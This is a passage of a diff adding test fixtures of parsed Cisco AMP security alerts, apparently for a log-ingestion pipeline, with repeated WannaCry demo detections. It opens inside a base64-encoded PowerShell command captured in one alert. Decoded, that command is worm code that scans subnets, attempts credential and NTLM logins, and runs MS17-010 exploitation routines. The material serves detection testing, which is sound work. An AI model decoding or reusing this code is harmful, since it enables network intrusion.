KQB7AGMAbwBuAHQAaQBuAHUAZQB9ACAACQANAAoAIAAgACAAIAAkAFMAdQBiAG4AZQB0AE0AYQBzAGsAIAAgAD0AIAAkAE4AZQB0AHcAbwByAGsALgBJAFAAUwB1AGIAbgBlAHQAWwAwAF0AIAAgAA0ACgAgACAAIAAgACQAaQBwAHMAPQBHAGUAdAAtAE4AZQB0AHcAbwByAGsAUgBhAG4AZwBlACAAJABJAFAAQQBkAGQAcgBlAHMAcwAgACQAUwB1AGIAbgBlAHQATQBhAHMAawANAAoACQAkAHQAYwBwAGMAbwBuAG4AIAA9ACAAbgBlAHQAcwB0AGEAdAAgAC0AYQBuAG8AcAAgAHQAYwBwACAADQAKAAkAZgBvAHIAZQBhAGMAaAAgACgAJAB0ACAAaQBuACAAJAB0AGMAcABjAG8AbgBuACkADQAKACAAIAAgACAAewANAAoAIAAgACAAIAAgACAAIAAgACQAbABpAG4AZQAgAD0AJAB0AC4AcwBwAGwAaQB0ACgAJwAgACcAKQB8ACAAPwB7ACQAXwB9AA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAhACgAJABsAGkAbgBlACAALQBpAHMAIABbAGEAcgByAGEAeQBdACkAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAaQBmACAAKAAkAGwAaQBuAGUALgBjAG8AdQBuAHQAIAAtAGwAZQAgADQAKQB7AGMAbwBuAHQAaQBuAHUAZQB9AA0ACgAJAAkAJABpAD0AJABsAGkAbgBlAFsALQAzAF0ALgBzAHAAbABpAHQAKAAnADoAJwApAFsAMABdAA0ACgAgACAAIAAgACAAIAAgACAAaQBmACAAKAAgACgAJABsAGkAbgBlAFsALQAyAF0AIAAtAGUAcQAgACcARQBTAFQAQQBCAEwASQBTAEgARQBEACcAKQAgAC0AYQBuAGQAIAAgACgAJABpACAALQBuAGUAIAAnADEAMgA3AC4AMAAuADAALgAxACcAKQAgAC0AYQBuAGQAIAAoACQAaQBwAHMAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQApACkADQAKACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAkAGkAcABzACsAPQAkAGkADQAKACAAIAAgACAAIAAgACAAIAB9AA0ACgAgACAAIAAgAH0ADQAKACAAIAAgACAAaQBmACAAKAAoAFsARQBuAHYAaQByAG8AbgBtAGUAbgB0AF0AOgA6AFQAaQBjAGsAQwBvAHUAbgB0AC0AJABzAHQAaQBtAGUAKQAvADEAMAAwADAAIAAtAGcAdAAgADUANAAwADAAKQB7AGIAcgBlAGEAawB9AA0ACgAgACAAIAAgAGYAbwByAGUAYQBjAGgAIAAoACQAaQBwACAAaQBuACAAJABpAHAAcwApAA0ACgAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAWwBFAG4AdgBpAHIAbwBuAG0AZQBuAHQAXQA6ADoAVABpAGMAawBDAG8AdQBuAHQALQAkAHMAdABpAG0AZQApAC8AMQAwADAAMAAgAC0AZwB0ACAANQA0ADAAMAApAHsAYgByAGUAYQBrAH0ADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACQAaQBwACAALQBlAHEAIAAkAEkAUABBAGQAZAByAGUAcwBzACkAewBjAG8AbgB0AGkAbgB1AGUAfQAgACAAIAAgACAADQAKACAAIAAgACAAIAAgACAAIABpAGYAIAAoACgAVABlAHMAdAAtAEMAbwBuAG4AZQBjAHQAaQBvAG4AIAAkAGkAcAAgAC0AYwBvAHUAbgB0ACAAMQApACAALQBuAGUAIAAkAG4AdQBsAGwAIAAgAC0AYQBuAGQAIAAkAGkAcABzAHUAIAAtAG4AbwB0AGMAbwBuAHQAYQBpAG4AcwAgACQAaQBwACkAIAANAAoAIAAgACAAIAAgACAAIAAgAHsAIAAgACAADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACQAcgBlAD0AMAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAaQBmACAAKAAkAGEALgBjAG8AdQBuAHQAIAAtAG4AZQAgADAAKQAgACAAIAAgACAAIAANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAewAkAHIAZQAgAD0AIAB0AGUAcwB0AC0AaQBwACAALQBpAHAAIAAkAGkAcAAgAC0AYwByAGUAZABzACAAJABhACAAIAAtAG4AaQBjACAAJABuAGkAYwAgAC0AbgB0AGwAbQAgACQATgBUAEwATQAgAH0ADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGkAZgAgACgAJAByAGUAIAAtAGUAcQAgADEAKQB7ACQAaQBwAHMAdQAgAD0AJABpAHAAcwB1ACAAKwAiACAAIgArACQAaQBwAH0ADQAKAAkACQAJAGUAbABzAGUADQAKAAkACQAJAHsADQAKAAkACQAJAAkAJAB2AHUAbAA9AFsAUABpAG4AZwBDAGEAcwB0AGwAZQAuAFMAYwBhAG4AbgBlAHIAcwAuAG0AMQA3AHMAYwBdADoAOgBTAGMAYQBuACgAJABpAHAAKQAJAAkACQAJAA0ACgAJAAkACQAJAGkAZgAgACgAJAB2AHUAbAAgAC0AYQBuAGQAIAAkAGkAMQA3ACAALQBuAG8AdABjAG8AbgB0AGEAaQBuAHMAIAAkAGkAcAApAA0ACgANAAoACQAJAAkACQB7AA0ACgAJAAkACQAJAAkAJAByAGUAcwA9AGUAYgA3ACAAJABpAHAAIAAkAHMAYwANAAoACQAJAAkACQAJAGkAZgAgACgAIQAoACQAcgBlAHMAIAAtAGUAcQAgACQAdAByAHUAZQApACkADQAKAAkACQAJAAkACQB7AGUAYgA4ACAAJABpAHAAIAAkAHMAYwB9AA0ACgAJAAkACQAJAAkAJABpADEANwAgAD0AIAAkAGkAMQA3ACAAKwAgACIAIAAiACsAJABpAHAADQAKAAkACQAJAAkAfQANAAoACQAJAAkAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKACAAIAAgACAAfQANAAoAIAB9ACAAIAAgACAAIAAgACAADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAD0ATgBlAHcALQBPAGIAagBlAGMAdAAgAE0AYQBuAGEAZwBlAG0AZQBuAHQALgBNAGEAbgBhAGcAZQBtAGUAbgB0AEMAbABhAHMAcwAoACcAcgBvAG8AdABcAGQAZQBmAGEAdQBsAHQAOgBjAG8AcgBlAGQAcAB1AHMAcwB2AHIAJwApACAAIAANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpAHAAcwB1ACcAIAAsACQAaQBwAHMAdQApAA0ACgAkAFMAdABhAHQAaQBjAEMAbABhAHMAcwAuAFAAdQB0ACgAKQANAAoAJABTAHQAYQB0AGkAYwBDAGwAYQBzAHMALgBTAGUAdABQAHIAbwBwAGUAcgB0AHkAVgBhAGwAdQBlACgAJwBpADEANwAnACAALAAkAGkAMQA3ACkADQAKACQAUwB0AGEAdABpAGMAQwBsAGEAcwBzAC4AUAB1AHQAKAApAA==",
+                                            "parent_puid": 132461352663910600,
+                                            "puid": 132465072105597400,
+                                            "user_sid": "010100000000000512000000",
+                                            "parent_pid": 2236,
+                                            "app_path": "C:\\Windows\\System32\\WindowsPowerShell\\v1.0",
+                                            "parent_app_path": "C:\\Windows\\System32\\wbem",
+                                            "user": "user@testdomain.com",
+                                            "ts": 1602033881727175700
+                                        }
+                                    }
+                                ]
+                            },
+                            "eng_epoch": 1,
+                            "schema_epoch": 2,
+                            "sig_id": 20190517123456,
+                            "actions": [
+                                {
+                                    "start_ts": 1602033881805,
+                                    "action": "end_process",
+                                    "params": [
+                                        "10724"
+                                    ],
+                                    "end_ts": 1602033881808,
+                                    "status": "success"
+                                }
+                            ]
+                        },
+                        "id": "d2616Ab846",
+                        "ts": 1610640884
+                    },
+                    "detection": "WMIPRVSE Launched Encoded Powershell Command",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "be:b0:d5:89:e2:96",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "be:b0:d5:89:e2:96"
+                        ]
+                    },
+                    "mitre_tactics": [
+                        "TA0002",
+                        "TA0005",
+                        "TA0008"
+                    ],
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "event_type_id": 553648222
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:50:23.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500191289Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":717000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867969\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6419247189909832000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419204897366867969",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:50:23.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500193359Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419179204872503298\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6419247189909832000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419179204872503298",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:50:23.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500195409Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":686000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419229327140847665\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6419247189909832000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419229327140847665",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:50:23.000Z",
+            "file": {
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500197554Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":639000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6419204897366867977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Quarantine Attempt Failed",
+                "id": "6419247189909832000",
+                "category": [
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "error": {
+                        "description": "Object name not found",
+                        "error_code": 3221225524
+                    },
+                    "detection_id": "6419204897366867977",
+                    "event_type_id": 2164260893
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:50:23.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\Windows\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500199614Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831755\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419247189909832000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419247189909831755",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:50:23.000Z",
+            "file": {
+                "name": "tasksche.exe",
+                "path": "\\\\?\\C:\\ProgramData\\qzkbplcgew884\\tasksche.exe",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500201691Z",
+                "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419247189909832000,\"timestamp\":1610639423,\"timestamp_nanoseconds\":888000000,\"date\":\"2021-01-14T15:50:23+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.Variant:Gen.20gl.1201\",\"detection_id\":\"6419247189909831754\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"tasksche.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ProgramData\\\\qzkbplcgew884\\\\tasksche.exe\",\"identity\":{\"sha256\":\"ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa\"}}}}",
+                "kind": "alert",
+                "action": "Retrospective Detection",
+                "id": "6419247189909832000",
+                "category": [
+                    "file",
+                    "malware"
+                ]
+            },
+            "cisco": {
+                "amp": {
+                    "detection": "W32.Variant:Gen.20gl.1201",
+                    "computer": {
+                        "active": true,
+                        "network_addresses": [
+                            {
+                                "mac": "53:74:31:cb:37:50",
+                                "ip": "10.10.10.10"
+                            }
+                        ],
+                        "connector_guid": "test_connector_guid",
+                        "external_ip": "8.8.8.8"
+                    },
+                    "file": {
+                        "disposition": "Malicious",
+                        "identity": {}
+                    },
+                    "connector_guid": "test_connector_guid",
+                    "related": {
+                        "mac": [
+                            "53:74:31:cb:37:50"
+                        ]
+                    },
+                    "group_guids": [
+                        "test_group_guid"
+                    ],
+                    "detection_id": "6419247189909831754",
+                    "event_type_id": 553648147
+                }
+            },
+            "tags": [
+                "preserve_original_event"
+            ]
+        },
+        {
+            "@timestamp": "2021-01-14T15:50:23.000Z",
+            "file": {
+                "name": "qeriuwjhrf",
+                "path": "\\\\?\\C:\\Windows\\qeriuwjhrf",
+                "hash": {
+                    "sha256": "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                }
+            },
+            "ecs": {
+                "version": "1.11.0"
+            },
+            "related": {
+                "hosts": [
+                    "Demo_WannaCry_Ransomware"
+                ],
+                "hash": [
+                    "ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa"
+                ],
+                "ip": [
+                    "8.8.8.8",
+                    "10.10.10.10"
+                ]
+            },
+            "host": {
+                "os": {
+                    "family": "windows",
+                    "platform": "windows"
+                },
+                "name": "Demo_WannaCry_Ransomware",
+                "hostname": "Demo_WannaCry_Ransomware"
+            },
+            "event": {
+                "severity": 3,
+                "ingested": "2021-09-12T17:31:54.500203753Z",
